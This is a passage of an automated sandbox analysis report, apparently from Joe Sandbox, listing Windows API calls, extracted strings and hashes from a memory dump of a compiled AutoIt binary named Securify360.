                                                                                              • SetErrorMode.KERNEL32(00000000,01022C4C,?,\\.\,01020980), ref: 00FFB59C
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000013.00000002.1451206484.0000000000F91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00F90000, based on PE: true
                                                                                              • Associated: 00000013.00000002.1451188533.0000000000F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001020000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001046000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451321302.0000000001050000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451347155.0000000001059000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_19_2_f90000_Securify360.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorMode$DriveType
                                                                                              • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                                                              • API String ID: 2907320926-4222207086
                                                                                              • Opcode ID: 852747cfae9bbd3433174afe85132ebd4bdaa0c5a1e32203ec9ff7c9cb9958ac
                                                                                              • Instruction ID: 56cd85b5632f17deee50a629899c40a9c4559c0d2b5230cca7d2895fb566d868
                                                                                              • Opcode Fuzzy Hash: 852747cfae9bbd3433174afe85132ebd4bdaa0c5a1e32203ec9ff7c9cb9958ac
                                                                                              • Instruction Fuzzy Hash: 0B519FB1B4020DEB8B10EF21C982A7977A0BF45750B3C402AE646EB265D73DEE45FB51
                                                                                              APIs
                                                                                              • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000103,?,?,?), ref: 0101A0F7
                                                                                              • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 0101A1B0
                                                                                              • SendMessageW.USER32(?,00001102,00000002,?), ref: 0101A1CC
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000013.00000002.1451206484.0000000000F91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00F90000, based on PE: true
                                                                                              • Associated: 00000013.00000002.1451188533.0000000000F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001020000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001046000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451321302.0000000001050000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451347155.0000000001059000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_19_2_f90000_Securify360.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend$Window
                                                                                              • String ID: 0
                                                                                              • API String ID: 2326795674-4108050209
                                                                                              • Opcode ID: 02cfa5869dc5856e95c3c45bb9ceaac29de913be6faeb466164eb3463a3dbbe9
                                                                                              • Instruction ID: c972d80f100c9f96755f5cc2c9921f5c99428e143c6d08a12c9f7e85bf3e2cdc
                                                                                              • Opcode Fuzzy Hash: 02cfa5869dc5856e95c3c45bb9ceaac29de913be6faeb466164eb3463a3dbbe9
                                                                                              • Instruction Fuzzy Hash: FF02DE3020A381EFE765CF18C848BAABBE4FF89314F048559FAD997299C739D944CB51
                                                                                              APIs
                                                                                              • GetSysColor.USER32(00000012), ref: 0101AF51
                                                                                              • SetTextColor.GDI32(?,?), ref: 0101AF55
                                                                                              • GetSysColorBrush.USER32(0000000F), ref: 0101AF6B
                                                                                              • GetSysColor.USER32(0000000F), ref: 0101AF76
                                                                                              • CreateSolidBrush.GDI32(?), ref: 0101AF7B
                                                                                              • GetSysColor.USER32(00000011), ref: 0101AF93
                                                                                              • CreatePen.GDI32(00000000,00000001,00743C00), ref: 0101AFA1
                                                                                              • SelectObject.GDI32(?,00000000), ref: 0101AFB2
                                                                                              • SetBkColor.GDI32(?,00000000), ref: 0101AFBB
                                                                                              • SelectObject.GDI32(?,?), ref: 0101AFC8
                                                                                              • InflateRect.USER32(?,000000FF,000000FF), ref: 0101AFE7
                                                                                              • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0101AFFE
                                                                                              • GetWindowLongW.USER32(00000000,000000F0), ref: 0101B013
                                                                                              • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0101B05F
                                                                                              • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0101B086
                                                                                              • InflateRect.USER32(?,000000FD,000000FD), ref: 0101B0A4
                                                                                              • DrawFocusRect.USER32(?,?), ref: 0101B0AF
                                                                                              • GetSysColor.USER32(00000011), ref: 0101B0BD
                                                                                              • SetTextColor.GDI32(?,00000000), ref: 0101B0C5
                                                                                              • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 0101B0D9
                                                                                              • SelectObject.GDI32(?,0101AC1F), ref: 0101B0F0
                                                                                              • DeleteObject.GDI32(?), ref: 0101B0FB
                                                                                              • SelectObject.GDI32(?,?), ref: 0101B101
                                                                                              • DeleteObject.GDI32(?), ref: 0101B106
                                                                                              • SetTextColor.GDI32(?,?), ref: 0101B10C
                                                                                              • SetBkColor.GDI32(?,?), ref: 0101B116
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000013.00000002.1451206484.0000000000F91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00F90000, based on PE: true
                                                                                              • Associated: 00000013.00000002.1451188533.0000000000F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001020000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001046000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451321302.0000000001050000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451347155.0000000001059000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_19_2_f90000_Securify360.jbxd
                                                                                              Similarity
                                                                                              • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                                                              • String ID:
                                                                                              • API String ID: 1996641542-0
                                                                                              • Opcode ID: d774dc51466f0ac7e22025302bb4500c8355dab9c3191082649b715f86c36bb2
                                                                                              • Instruction ID: a2fc24f5071e04c9ecf799d6a376ce1ced2f7126c937f40c05ebe90f55c80618
                                                                                              • Opcode Fuzzy Hash: d774dc51466f0ac7e22025302bb4500c8355dab9c3191082649b715f86c36bb2
                                                                                              • Instruction Fuzzy Hash: 95615E71901218EFDF219FA8DC48EAE7BB9FF08320F204155F955AB299D77A9940CF90
                                                                                              APIs
                                                                                              • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 010190EA
                                                                                              • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 010190FB
                                                                                              • CharNextW.USER32(0000014E), ref: 0101912A
                                                                                              • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 0101916B
                                                                                              • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 01019181
                                                                                              • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 01019192
                                                                                              • SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 010191AF
                                                                                              • SetWindowTextW.USER32(?,0000014E), ref: 010191FB
                                                                                              • SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 01019211
                                                                                              • SendMessageW.USER32(?,00001002,00000000,?), ref: 01019242
                                                                                              • _memset.LIBCMT ref: 01019267
                                                                                              • SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 010192B0
                                                                                              • _memset.LIBCMT ref: 0101930F
                                                                                              • SendMessageW.USER32(?,00001053,000000FF,?), ref: 01019339
                                                                                              • SendMessageW.USER32(?,00001074,?,00000001), ref: 01019391
                                                                                              • SendMessageW.USER32(?,0000133D,?,?), ref: 0101943E
                                                                                              • InvalidateRect.USER32(?,00000000,00000001), ref: 01019460
                                                                                              • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 010194AA
                                                                                              • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 010194D7
                                                                                              • DrawMenuBar.USER32(?), ref: 010194E6
                                                                                              • SetWindowTextW.USER32(?,0000014E), ref: 0101950E
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000013.00000002.1451206484.0000000000F91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00F90000, based on PE: true
                                                                                              • Associated: 00000013.00000002.1451188533.0000000000F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001020000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001046000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451321302.0000000001050000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451347155.0000000001059000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_19_2_f90000_Securify360.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
                                                                                              • String ID: 0
                                                                                              • API String ID: 1073566785-4108050209
                                                                                              • Opcode ID: 17fac62d1f6d86e90ef88c8a12c4b4dfa247de0acfc925c25cb154e0222b0efc
                                                                                              • Instruction ID: ee53a68eeb2c439a41f5d05551c120574220fd253bc4b66b0a4ba47556095bf8
                                                                                              • Opcode Fuzzy Hash: 17fac62d1f6d86e90ef88c8a12c4b4dfa247de0acfc925c25cb154e0222b0efc
                                                                                              • Instruction Fuzzy Hash: CAE1E470900208AFDF619F95CC98EEE7BB8FF09714F108195FA95AB188D7798A81CF51
                                                                                              APIs
                                                                                              • GetCursorPos.USER32(?), ref: 01015007
                                                                                              • GetDesktopWindow.USER32 ref: 0101501C
                                                                                              • GetWindowRect.USER32(00000000), ref: 01015023
                                                                                              • GetWindowLongW.USER32(?,000000F0), ref: 01015085
                                                                                              • DestroyWindow.USER32(?), ref: 010150B1
                                                                                              • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 010150DA
                                                                                              • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 010150F8
                                                                                              • SendMessageW.USER32(?,00000439,00000000,00000030), ref: 0101511E
                                                                                              • SendMessageW.USER32(?,00000421,?,?), ref: 01015133
                                                                                              • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 01015146
                                                                                              • IsWindowVisible.USER32(?), ref: 01015166
                                                                                              • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 01015181
                                                                                              • SendMessageW.USER32(?,00000411,00000001,00000030), ref: 01015195
                                                                                              • GetWindowRect.USER32(?,?), ref: 010151AD
                                                                                              • MonitorFromPoint.USER32(?,?,00000002), ref: 010151D3
                                                                                              • GetMonitorInfoW.USER32(00000000,?), ref: 010151ED
                                                                                              • CopyRect.USER32(?,?), ref: 01015204
                                                                                              • SendMessageW.USER32(?,00000412,00000000), ref: 0101526F
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000013.00000002.1451206484.0000000000F91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00F90000, based on PE: true
                                                                                              • Associated: 00000013.00000002.1451188533.0000000000F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001020000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001046000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451321302.0000000001050000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451347155.0000000001059000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_19_2_f90000_Securify360.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                                                              • String ID: ($0$tooltips_class32
                                                                                              • API String ID: 698492251-4156429822
                                                                                              • Opcode ID: 436088b17cbbff83b37e6a80e377341ffc651cf4ac8e8c5cc746a8504a1ed477
                                                                                              • Instruction ID: 501e2e424086abe3a7fd1414726b21171800c1cce1eed845193fe85617058019
                                                                                              • Opcode Fuzzy Hash: 436088b17cbbff83b37e6a80e377341ffc651cf4ac8e8c5cc746a8504a1ed477
                                                                                              • Instruction Fuzzy Hash: F2B19C71604300AFEB55DF64CC88B6ABBE4BF89710F008A1CF5D99B295D779E805CB91
                                                                                              APIs
                                                                                              • GetFileVersionInfoSizeW.VERSION(?,?), ref: 00FF499C
                                                                                              • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 00FF49C2
                                                                                              • _wcscpy.LIBCMT ref: 00FF49F0
                                                                                              • _wcscmp.LIBCMT ref: 00FF49FB
                                                                                              • _wcscat.LIBCMT ref: 00FF4A11
                                                                                              • _wcsstr.LIBCMT ref: 00FF4A1C
                                                                                              • VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 00FF4A38
                                                                                              • _wcscat.LIBCMT ref: 00FF4A81
                                                                                              • _wcscat.LIBCMT ref: 00FF4A88
                                                                                              • _wcsncpy.LIBCMT ref: 00FF4AB3
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000013.00000002.1451206484.0000000000F91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00F90000, based on PE: true
                                                                                              • Associated: 00000013.00000002.1451188533.0000000000F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001020000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001046000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451321302.0000000001050000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451347155.0000000001059000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_19_2_f90000_Securify360.jbxd
                                                                                              Similarity
                                                                                              • API ID: _wcscat$FileInfoVersion$QuerySizeValue_wcscmp_wcscpy_wcsncpy_wcsstr
                                                                                              • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                                                              • API String ID: 699586101-1459072770
                                                                                              • Opcode ID: be49ffcdf76d90388ac913921523df58c2b9f274e1fe51135d7fc20846c87b59
                                                                                              • Instruction ID: 12adc99b82ff1874a3e5344b0fa20ff9e2e15ffd0e568137b06b14c301a92eb2
                                                                                              • Opcode Fuzzy Hash: be49ffcdf76d90388ac913921523df58c2b9f274e1fe51135d7fc20846c87b59
                                                                                              • Instruction Fuzzy Hash: 7B410772A402187BD710BB768D47EFF776CEF45720F100059FA04A6153EB38EA01BAA5
                                                                                              APIs
                                                                                              • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00F92C8C
                                                                                              • GetSystemMetrics.USER32(00000007), ref: 00F92C94
                                                                                              • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00F92CBF
                                                                                              • GetSystemMetrics.USER32(00000008), ref: 00F92CC7
                                                                                              • GetSystemMetrics.USER32(00000004), ref: 00F92CEC
                                                                                              • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00F92D09
                                                                                              • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00F92D19
                                                                                              • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00F92D4C
                                                                                              • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00F92D60
                                                                                              • GetClientRect.USER32(00000000,000000FF), ref: 00F92D7E
                                                                                              • GetStockObject.GDI32(00000011), ref: 00F92D9A
                                                                                              • SendMessageW.USER32(00000000,00000030,00000000), ref: 00F92DA5
                                                                                                • Part of subcall function 00F92714: GetCursorPos.USER32(?), ref: 00F92727
                                                                                                • Part of subcall function 00F92714: ScreenToClient.USER32(010577B0,?), ref: 00F92744
                                                                                                • Part of subcall function 00F92714: GetAsyncKeyState.USER32(00000001), ref: 00F92769
                                                                                                • Part of subcall function 00F92714: GetAsyncKeyState.USER32(00000002), ref: 00F92777
                                                                                              • SetTimer.USER32(00000000,00000000,00000028,00F913C7), ref: 00F92DCC
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000013.00000002.1451206484.0000000000F91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00F90000, based on PE: true
                                                                                              • Associated: 00000013.00000002.1451188533.0000000000F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001020000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001046000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451321302.0000000001050000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451347155.0000000001059000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_19_2_f90000_Securify360.jbxd
                                                                                              Similarity
                                                                                              • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                                                              • String ID: AutoIt v3 GUI
                                                                                              • API String ID: 1458621304-248962490
                                                                                              • Opcode ID: ce7cd4c93b43110e900a71ac883a014841246146aad9f09656c5ae31a40017c7
                                                                                              • Instruction ID: 08727224cdcdcd37b442843255b4756cd66783d4ba74814ee1dafa212c3b5203
                                                                                              • Opcode Fuzzy Hash: ce7cd4c93b43110e900a71ac883a014841246146aad9f09656c5ae31a40017c7
                                                                                              • Instruction Fuzzy Hash: 07B17071A0030AAFEF64DFA8DD45FAE7BB4FB48320F104119FA55A7284DB799841EB50
                                                                                              APIs
                                                                                                • Part of subcall function 00FA1821: _memmove.LIBCMT ref: 00FA185B
                                                                                              • GetForegroundWindow.USER32(01020980,?,?,?,?,?), ref: 00FB04E3
                                                                                              • IsWindow.USER32(?), ref: 00FE66BB
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000013.00000002.1451206484.0000000000F91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00F90000, based on PE: true
                                                                                              • Associated: 00000013.00000002.1451188533.0000000000F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001020000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001046000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451321302.0000000001050000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451347155.0000000001059000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_19_2_f90000_Securify360.jbxd
                                                                                              Similarity
                                                                                              • API ID: Window$Foreground_memmove
                                                                                              • String ID: ACTIVE$ALL$CLASS$HANDLE$INSTANCE$LAST$REGEXPCLASS$REGEXPTITLE$TITLE
                                                                                              • API String ID: 3828923867-1919597938
                                                                                              • Opcode ID: 4c6f85e7d6f8852f50be36cf656d1f4d410838026b587e482496c01d973d3a76
                                                                                              • Instruction ID: b03d4920a39ef56a4c5a94a9e4709e2c505b56ceca007c8caa1713dbc889d84a
                                                                                              • Opcode Fuzzy Hash: 4c6f85e7d6f8852f50be36cf656d1f4d410838026b587e482496c01d973d3a76
                                                                                              • Instruction Fuzzy Hash: F9D13770504346DFCB14EF22C880A9ABBB1BF65394F204A19F496871A1DF34F959EF91
                                                                                              APIs
                                                                                              • CharUpperBuffW.USER32(?,?), ref: 010144AC
                                                                                              • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 0101456C
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000013.00000002.1451206484.0000000000F91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00F90000, based on PE: true
                                                                                              • Associated: 00000013.00000002.1451188533.0000000000F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001020000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001046000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451321302.0000000001050000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451347155.0000000001059000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_19_2_f90000_Securify360.jbxd
                                                                                              Similarity
                                                                                              • API ID: BuffCharMessageSendUpper
                                                                                              • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                                                                                              • API String ID: 3974292440-719923060
                                                                                              • Opcode ID: 37d5cfaa4366cc6f87ba640559d6c4ac2137d93f3dac00144f00a74fde11114e
                                                                                              • Instruction ID: 51340ffed9969d65667a397265183747f02f8c009bf7f1c0c2afa1bafc6cb248
                                                                                              • Opcode Fuzzy Hash: 37d5cfaa4366cc6f87ba640559d6c4ac2137d93f3dac00144f00a74fde11114e
                                                                                              • Instruction Fuzzy Hash: BDA18E702143019FDB14EF24CD51A6AB7A5BF89314F108968F9D69B2E6DF38EC06CB91
                                                                                              APIs
                                                                                              • LoadCursorW.USER32(00000000,00007F89), ref: 010056E1
                                                                                              • LoadCursorW.USER32(00000000,00007F8A), ref: 010056EC
                                                                                              • LoadCursorW.USER32(00000000,00007F00), ref: 010056F7
                                                                                              • LoadCursorW.USER32(00000000,00007F03), ref: 01005702
                                                                                              • LoadCursorW.USER32(00000000,00007F8B), ref: 0100570D
                                                                                              • LoadCursorW.USER32(00000000,00007F01), ref: 01005718
                                                                                              • LoadCursorW.USER32(00000000,00007F81), ref: 01005723
                                                                                              • LoadCursorW.USER32(00000000,00007F88), ref: 0100572E
                                                                                              • LoadCursorW.USER32(00000000,00007F80), ref: 01005739
                                                                                              • LoadCursorW.USER32(00000000,00007F86), ref: 01005744
                                                                                              • LoadCursorW.USER32(00000000,00007F83), ref: 0100574F
                                                                                              • LoadCursorW.USER32(00000000,00007F85), ref: 0100575A
                                                                                              • LoadCursorW.USER32(00000000,00007F82), ref: 01005765
                                                                                              • LoadCursorW.USER32(00000000,00007F84), ref: 01005770
                                                                                              • LoadCursorW.USER32(00000000,00007F04), ref: 0100577B
                                                                                              • LoadCursorW.USER32(00000000,00007F02), ref: 01005786
                                                                                              • GetCursorInfo.USER32(?), ref: 01005796
                                                                                              • GetLastError.KERNEL32(00000001,00000000), ref: 010057C1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000013.00000002.1451206484.0000000000F91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00F90000, based on PE: true
                                                                                              • Associated: 00000013.00000002.1451188533.0000000000F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001020000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001046000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451321302.0000000001050000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451347155.0000000001059000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_19_2_f90000_Securify360.jbxd
                                                                                              Similarity
                                                                                              • API ID: Cursor$Load$ErrorInfoLast
                                                                                              • String ID:
                                                                                              • API String ID: 3215588206-0
                                                                                              • Opcode ID: c6c303cb6d91a311a925c2eb798708a007cdfa72f7712478c3380667c0614e37
                                                                                              • Instruction ID: 7223530c7fc64263de99aff7fb90b9817a0b3ba3d61e3083d6a362bfe87e6ba5
                                                                                              • Opcode Fuzzy Hash: c6c303cb6d91a311a925c2eb798708a007cdfa72f7712478c3380667c0614e37
                                                                                              • Instruction Fuzzy Hash: AF414470E043196ADB509FBA8C49D6EFEF8EF51B10F10452BE549E7290DAB865018F91
                                                                                              APIs
                                                                                              • GetClassNameW.USER32(?,?,00000100), ref: 00FEB17B
                                                                                              • __swprintf.LIBCMT ref: 00FEB21C
                                                                                              • _wcscmp.LIBCMT ref: 00FEB22F
                                                                                              • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00FEB284
                                                                                              • _wcscmp.LIBCMT ref: 00FEB2C0
                                                                                              • GetClassNameW.USER32(?,?,00000400), ref: 00FEB2F7
                                                                                              • GetDlgCtrlID.USER32(?), ref: 00FEB349
                                                                                              • GetWindowRect.USER32(?,?), ref: 00FEB37F
                                                                                              • GetParent.USER32(?), ref: 00FEB39D
                                                                                              • ScreenToClient.USER32(00000000), ref: 00FEB3A4
                                                                                              • GetClassNameW.USER32(?,?,00000100), ref: 00FEB41E
                                                                                              • _wcscmp.LIBCMT ref: 00FEB432
                                                                                              • GetWindowTextW.USER32(?,?,00000400), ref: 00FEB458
                                                                                              • _wcscmp.LIBCMT ref: 00FEB46C
                                                                                                • Part of subcall function 00FB385C: _iswctype.LIBCMT ref: 00FB3864
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000013.00000002.1451206484.0000000000F91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00F90000, based on PE: true
                                                                                              • Associated: 00000013.00000002.1451188533.0000000000F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001020000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001046000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451321302.0000000001050000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451347155.0000000001059000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_19_2_f90000_Securify360.jbxd
                                                                                              Similarity
                                                                                              • API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_iswctype
                                                                                              • String ID: %s%u
                                                                                              • API String ID: 3744389584-679674701
                                                                                              • Opcode ID: b0b3526227745fd3741ce39e84861cfa3c9ca1ad097677a3bac22e173dc55780
                                                                                              • Instruction ID: 74374998336b6153042779f8b674a78293f6d5f4274a2552f62f159685d3e0df
                                                                                              • Opcode Fuzzy Hash: b0b3526227745fd3741ce39e84861cfa3c9ca1ad097677a3bac22e173dc55780
                                                                                              • Instruction Fuzzy Hash: EFA1F071604346EFD724DF22C884BEBB7A8FF44324F204629F999C2191EB34E905DB91
                                                                                              APIs
                                                                                              • GetClassNameW.USER32(00000008,?,00000400), ref: 00FEBAB1
                                                                                              • _wcscmp.LIBCMT ref: 00FEBAC2
                                                                                              • GetWindowTextW.USER32(00000001,?,00000400), ref: 00FEBAEA
                                                                                              • CharUpperBuffW.USER32(?,00000000), ref: 00FEBB07
                                                                                              • _wcscmp.LIBCMT ref: 00FEBB25
                                                                                              • _wcsstr.LIBCMT ref: 00FEBB36
                                                                                              • GetClassNameW.USER32(00000018,?,00000400), ref: 00FEBB6E
                                                                                              • _wcscmp.LIBCMT ref: 00FEBB7E
                                                                                              • GetWindowTextW.USER32(00000002,?,00000400), ref: 00FEBBA5
                                                                                              • GetClassNameW.USER32(00000018,?,00000400), ref: 00FEBBEE
                                                                                              • _wcscmp.LIBCMT ref: 00FEBBFE
                                                                                              • GetClassNameW.USER32(00000010,?,00000400), ref: 00FEBC26
                                                                                              • GetWindowRect.USER32(00000004,?), ref: 00FEBC8F
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000013.00000002.1451206484.0000000000F91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00F90000, based on PE: true
                                                                                              • Associated: 00000013.00000002.1451188533.0000000000F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001020000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001046000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451321302.0000000001050000.00000004.00000001.01000000.00000009.sdmpDownload File
